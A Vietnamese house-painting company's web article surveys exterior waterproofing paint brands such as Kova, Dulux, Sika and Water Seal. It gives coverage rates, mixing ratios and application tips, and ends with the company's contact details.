max-video-preview:-1' /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" /> <!-- This site is optimized with the Yoast SEO Premium plugin v19.2.1 (Yoast SEO v19.8) - https://yoast.com/wordpress/plugins/seo/ --> <title>Các loại sơn chống thấm ngoài trời - Sơn Nhà Gia Phát

Các loại sơn chống thấm ngoài trời

Một ngôi nhà đẹp toàn diện tức là đẹp từ bên ngoài lẫn bên trong, trọn vẹn về cả thẩm mỹ lẫn chất lượng. Hãy chọn các loại sơn chống thấm ngoài trời chất lượng ngay từ khi bắt đầu khởi công. Hãy cùng xem qua bài viết Tổng hợp các loại sơn chống thấm ngoài trời để hiểu hơn về nội dung này nhé.

Sơn chống thấm là gì?

Sơn chống thấm là hỗn hợp các chất chống thấm đặc biệt có khả năng chống lại sự ngấm ẩm, giúp ngăn chặn sự xâm nhập của nước và chất lỏng vào kết cấu công trình xây dựng. Sơn chống thấm có tác dụng ngăn chặn nước từ trên xuống dưới, vẫn có khả năng giúp nước bốc hơi từ trong tường ra ngoài. Sử dụng được cho bề mặt nằm ngang, thẳng đứng sau xây và trát tường trước khi thi công phần hoàn thiện.

Sơn chống thấm trong nhà

Sơn chống thấm trong nhà là loại chất chống thấm giúp bảo vệ bề mặt trong nhà. Thông thường vừa có khả năng chống thấm nước, vừa có khả năng hạn chế nấm mốc. Hiện nay, các sản phẩm sơn chống thấm trong nhà thường được tích hợp sẵn sơn lót nhằm tiết kiệm chi phí.

Sơn chống thấm ngoài trời

Sơn chống thấm ngoài trời có tính năng vượt trội hơn hẳn và đảm bảo về chống thấm nước, ngăn chặn nấm mốc cao. Vì nó trực tiếp tiếp xúc với môi trường nên cần lựa chọn kỹ càng và thi công đúng kỹ thuật để đạt hiệu quả tốt nhất. Giá sơn chống thấm ngoài trời thường cao sơn 1.5 lần so với chất chống thấm trong nhà vì tính năng ưu việt hơn.

Sơn chống thấm ngoài trời mang nhiều ưu điểm
Sơn chống thấm ngoài trời mang nhiều ưu điểm

Các vị trí thường gặp sự cố thấm ẩm cần sử dụng sản phẩm chống thấm:

  • – Tường đứng của nhà
  • – Trần nhà
  • – Sàn nhà vệ sinh
  • – Sân thượng
  • – Bể nước
  • – Khu vực tiếp giáp hai bức tường

Lý do nên chọn sơn chống thấm ngoài trời

Là một trong những biện pháp ngăn nước tối ưu cho các công trình, sơn chống thấm ngoài trời mang đến nhiều ưu điểm đã được công nhận rộng rãi.

+ Ngăn cản lại sự xâm nhập của nước từ bên ngoài vào trong nhà

+ Bịt kín những điểm hở trên tường mà nước có thể xuyên qua

+ Bảo vệ tường tốt hơn bởi khả năng chống nấm mốc, bám bụi

+ Sơn chất lượng cao, mịn, bóng, bền màu, đảm bảo mỹ quan công trình

+ Sơn tường nhà đẹp, chặn đứng tình trạng xuống cấp của tường nhà

+ Bảo vệ an toàn cho các thiết bị, đồ đạc bên trong nhà. Đặc biệt là các loại thiết bị điện tử kê sát tường.

Sơn chống thấm Kova

Sơn chống thấm Kova là một trong các loại sơn chống thấm Việt, công nghệ Việt dành cho người Việt. Sơn chống thấm Kova là phát minh của Ts.Nguyễn Thị Hòe một nhà nghiên cứu khoa học của Việt Nam được ứng dụng trong rất nhiều hạng mục.

Trong đó có sản phẩm Sơn chống thấm pha xi măng Kova CT-11A chuyên dùng cho chống thấm tường ngoài trời, sàn bê tông,… Được rất nhiều tin tưởng và lựa chọn bởi chất lượng đỉnh cao của nó. Với những ngôi nhà mới xây xong thì không thể thiếu sơn chống thấm cho tường ngoài trời. Và chúng tôi khuyên bạn nên lựa chọn Sơn chống thấm pha xi măng Kova CT-11A.

Sơn Kova
Sơn Kova

Ngoài ra, hãng sơn Kova còn có thêm một vài sản phẩm chống thấm khác như: Sơn chống thấm Kova CT11B, chống thấm co giãn Kova CT14 dùng để trám vá các vết nứt bê tông. Đối với các vị trí như sàn mái, sân thượng, tầng hầm, sân tennis có thể dùng Mattit chịu ẩm Kova SK6 để chống thấm. Còn Xi măng đông kết nhanh Kova CT05 được ví như “Nút chặn” các vết nứt bê tông trong môi trường nước.

Sơn Nippon

Nippon là một trong những loại sơn chống thấm tốt tại thị trường Việt hiện nay. Thương hiệu đến từ Nhật Bản này ra đời từ những năm 1881 với những ưu điểm như sau:

– Thân thiện với môi trường.

– Mùi nhẹ, dễ chịu ngay cả trong lúc thi công hay quá trình khô sau này.

– Cho độ che phủ bề mặt cao, tiết kiệm sơn và chi phí.

– Màu cực kỳ bền, kháng bám bẩn và có khả năng chùi rửa rất tốt.

– Rất bền màu, có khả năng chịu chùi rửa tốt.

Sơn chống thấm Jymec

+ Cấu tạo sơn chống thấm Jymec: tổng hợp từ Acrylonitrile và Alkylsioxan.

+ Chuyên dùng cho các hoạt động chống thấm ngược cho tường nhà

+ Khả năng bám dính cao

+ Tuổi thọ sử dụng kéo dài có thể lên đến 20 năm

+ An toàn, không độc hại, không chì, không thủy ngân, thân thiện môi trường

>> Lựa chọn hàng đầu cho chống thấm tường nhà ngoài trời các công trình cao ốc, chung cư, khách sạn,…

Sơn chống thấm Dulux

Dulux có lẽ là cái tên quá quen thuộc với mọi người tiêu dùng đã và đang có ý định xây nhà bởi những tiện ích, sự tuyệt vời mà dòng sơn chống thấm này mang lại là rất lớn. Sơn chống thấm Dulux là một thương hiệu rất nổi tiếng của tập đoàn ICI, mang đến cho người tiêu dùng cảm giác an tâm hơn về chất lượng.

Một trong những ưu điểm nổi trội của dòng sơn chống thấm Dulux này là khả năng giúp bề mặt đanh chắc hơn, chống thấm vượt trội, thích hợp với bề mặt xi măng hoặc bê tông như tường ngoài. Đồng thời, sơn chống thấm Dulux còn bảo vệ tường nhà không bị hoen ố hay nấm mốc, mang lại sự yên tâm cho gia đình của bạn.

Tuy nhiên, khi sử dụng dòng sơn chống thấm này, gia đình bạn cần phải lưu ý:

  • Không thi công sơn chống thấm Dulux trong điều kiện mưa gió, ẩm ướt để tạo được cảm quan thẩm mỹ của bề mặt công trình sau khi hoàn thiện.
  • Khoảng thời gian thi công giữa lớp sau và lớp trước là từ 6 đến 8 giờ.
  • Thời gian khô: nhiệt độ môi trường vào khoảng 30 độ C kèm theo độ ẩm không khí là 80% thì thời gian khô là từ 1 đến 2 giờ.
Sơn  Dulux
Sơn Dulux

Xem thêm:  Học ngay 6 bước sơn tường tiết kiệm chi phí

Sơn Sika

Cái tên quen thuộc trong dòng sơn chống thấm đó là Sika. Dựa vào tính năng và giá thành mà sơn này đang rất phổ biến trong việc chống thấm sàn mái, tường, sàn nhà vệ sinh v.v

Sơn chống thấm Sika
Sơn chống thấm Sika

Sơn Spec

– Sơn chống thấm Spec Super Fixx được kết cấu đặc biệt bởi 2 dòng nhựa Acrylic và Styrene Acrylic kết hợp pha trộn với xi măng. Sơn chống thấm Spec Super Fixx thích hợp chống thấm cho tường đứng, sàn nhà vệ sinh…

Sơn chống thấm Spec Super Fixx
Sơn chống thấm Spec Super Fixx

– 1 lít Sơn chống thấm pha xi măng Spec có định mức 5-6m2/2lớp đóng gói như sau:

1 lít / lon – phủ được 5-6 m2/2 lớp

4.5 lít / lon – phủ được 20-24 m2/2 lớp

18 lít / lon – phủ được 100-110 m2/2 lớp.

Sơn chống thấm Mykolor

Mykolor là một trong top 5 ông trùm ngành sơn. Chính vì thế, khi nói về sơn chống thấm tốt nhất hiện nay chúng ta không thể không kể tới sơn chống thấm pha xi măng Mykolor có chất lượng tốt giúp ngôi nhà chống lại tác hại của nước mưa.

Bản chất sơn chống thấm Mykolor là hợp chất chống thấm thể lỏng được cấu tạo từ nhựa Acrylic và nhựa Styrene Acrylic nên có khả năng chống thấm đa năng rất tốt cho các bề mặt như: Chống thấm cho tường, Chống thấm nhà vệ sinh, Chống thấm ban công, sân thượng, Chống thấm ngược cho sàn nhà, Chống thấm bề nước….

Để tránh những sự cố khi sử dụng sơn chống thấm Mykolor cần lưu ý

​1. Không quét sơn chống thấm Mykolor lên bề mặt tường đã sử dụng các loại sơn chống thấm gốc dầu.

2. Không quét xi măng, hồ dầu trước khi sơn chống thấm.

3. Đối với tường có các vết nứt nhỏ phải quét từ 3 lớp trở lên.

4. Đối với các vết nứt lớn phải đục ra và trám trét trước khi sơn chống thấm.

5. Nếu đã trộn sơn chống thấm với xi măng thì phải sử dụng hết trong vòng 2 giờ.

6. Do là sơn chống thấm gốc xi măng nên phải sử dụng sơn lót chống kiềm theo hệ thống sau khi thi công sơn chống thấm.

7. Không trét bột bả Mykolor lên bề mặt đã được sơn chống thấm.

Sơn chống thấm Mykolor 
Sơn chống thấm Mykolor

Sơn Water Seal

Chống thấm Water Seal được ứng dụng rộng rãi cho tường nhà, sàn mái bê tông, ban công, nhà vệ sinh, vách ngoài tầng hầm, chân tường, đá tự nhiên…

Sơn chống thấm Water Seal
Sơn chống thấm Water Seal

Water Seal là một hợp chất chống thấm lỏng trong suốt dạ ng thẩm thấu vào vật liệu. Được hình thành bởi dung dịch biến tính, nước và một số phụ gia, cấu tạo bởi một loạt các hợp chất độc quyền khác Water seal dễ dàng thấm sâu vào vữa hay bê tông tạo phản ứng Silic phát triển Gel để lấp kín những lỗ li ti, mao dẫn và hàn gắn đường nứt tới 0,3 mm.

Định mức sử dụng

Tùy thuộc vào mục đích sử dụng mà chống thấm Water Seal DPC sẽ có độ phủ khác nhau. Cụ thể như sau:

  • Chống thấm tường trong nhà hoặc ngoài trời ( trường hợp trát lại tường hoặc tường mới chưa trát) các bạn làm như sau: Trộn 1 lít Water Seal DPC + 14 lít nước + 25Kg xi măng + 75 kg cát tạo thành hỗn hợp vữa trát dùng để chống thấm cho 2 đến 3 m2 tường.
  • Chống thấm tường trong nhà hoặc ngoài trời ( trường hợp tường đã trát hoặc không cần trát lại) làm như sau: Không cần pha trộn thêm bất kỳ chất gì chỉ cần đổ Water seal vào bình và tiến hành phun với định mức 0,2 đến 0,3 lít cho 1m2
  • Chống thấm tường trong nhà hoặc ngoài trời ( trường hợp không thể trát được do khe tiếp giáp giữa hai nhà liền kề quá nhỏ khó bắc giáo hay vì một lý do nào đó) chúng ta sẽ tiến hành phun với định mức 0,5 lít Water seal DPC cho 1 m2 tường.
  • Chống thấm sàn nhà vệ sinh, sàn mái, sàn sân thượng, sàn bê tông mác > 250: Lượng Water Seal DPC cần dùng phụ thuộc vào bề mặt sàn, thông thường cần 0,5 -2 lít/ m2
  • Chống thấm chân tường: Sử dụng 2,5 – 3 lít Water seal DPC để rót chống thấm cho 1 m2 tường đôi; 1,5 – 1,7 lít cho 1m2 tường đơn.

Như bạn đã thấy, Water Seal rất linh hoạt trong việc chống thấm. Và hiệu quả của nó thì thực sự rất OK, kết quả đã được kiểm chúng bởi rất nhiều công trình như TTTM Royal City, TTTM Time City, và rất nhiều công trình nhà dân khác.

Sơn chống thấm CPON Việt Nhật

SƠN CHỐNG THẤM CPON Việt Nhật được sản xuất theo công nghệ tiên tiến với chất chống thấm có sự tham gia của nguyên liệu là bột đá Thạch Anh, giúp ngăn ngừa sự phát triển của nấm mốc, phù hợp với khí hậu nhiệt đới gió mùa. Cũng là một trong số các loại sơn chống thấm  được tin dùng hiện nay

Sơn Chống thấm CPON Việt Nhật có 2 loại:

– SƠN CHỐNG THẤM NGOẠI THẤT TRỘN XI MĂNG: Dùng để chống thấm tường đứng, trần nhà, bể nước, độ co giãn cao, chống rêu mốc, chống bám bụi,…

– SƠN CHỐNG THẤM NGOẠI THẤT MÀU là loại sơn đặc biệt, dùng để sơn lót trước khi phủ các lớp sơn hoàn thiện, đã được nghiên cứu và thử nghiệm rất phù hợp với khí hậu Việt Nam. Sơn chống thấm ngoại thất màu liên kết bền chặt với bề mặt, khả năng thấm sâu vào vật liệu do có cấu trúc hạt polymer siêu nhỏ nên tăng cường tính chất cơ lý của vật liệu, có tính kháng kiềm mạnh, tương hợp với tất cả các loại sơn CPON.

Những điều cần lưu ý khi chống thấm tường ngoài trời

Việc chọn các loại sơn chống thấm tường ngoài trời được chia làm 2 loại đó là: những công trình mới và những công trình đã qua sử dụng. Đặc điểm của những công trình này là khác nhau chính vì thế khi bạn quyết định sử dụng sơn chống thấm ngoài trời bạn cần đặc biệt chú ý đến đặc điểm này để có phương pháp sơn đúng nhất và đạt hiệu quả cao nhất.

– Đối với tường những công trình mới:

Đầu tiên chúng ta cần dùng loại bột trét tường, loại bột dành cho ngoài trời để phủ kín bề mặt. Sau đó chúng ta tiến hàng làm phảng và láng kín bề mặt tường. Với việc làm ấy bạn sẽ che kín được những khe hở trên tường. Tiếp theo bạn dùng dụng cụ chuyên dùng phủ một lớp sơn lót sau đó mới đến lớp sơn chống thấm ngoài trời.

– Đối với tường những công trình đã qua sử dụng:

với các công trình đã qua sử dụng một thời gian thì trên tường sẽ thường có những lớp rêu mốc hoặc có thể là những vết nứt trên bề mặt tường.

Để có thể sử dụng sơn chống thấm cho những công trình này chúng ta cần vệ sinh công nghiệp toàn bộ bề mặt cho thật sạch sẽ để giúp tăng thêm độ bám cho các vật liệu trên bề mặt. Tiếp sau đó chúng ta mới sử dụng những vật liệu che đi các vết rạn nứt và dùng sơn chống thấm ngoài trời.

Xem thêm:  Tổng hợp các loại sơn nước nổi tiếng trên thị trường

Liên hệ tư vấn dịch vụ sơn nhà

Địa chỉ: 22 Đường 10 Phước Long B, Quận 9, HCM
Điện thoại: 0889 146 303
Nhà xưởng: 10/33 Đường 79, Phước Long B, Q.9. HCM
Email: sonnhagiaphat@gmail.com
Website: https://sonnhagiaphat.com/

5/5 (1 Review)

Leave a Reply

Your email address will not be published.

error: Alert: Content selection is disabled!!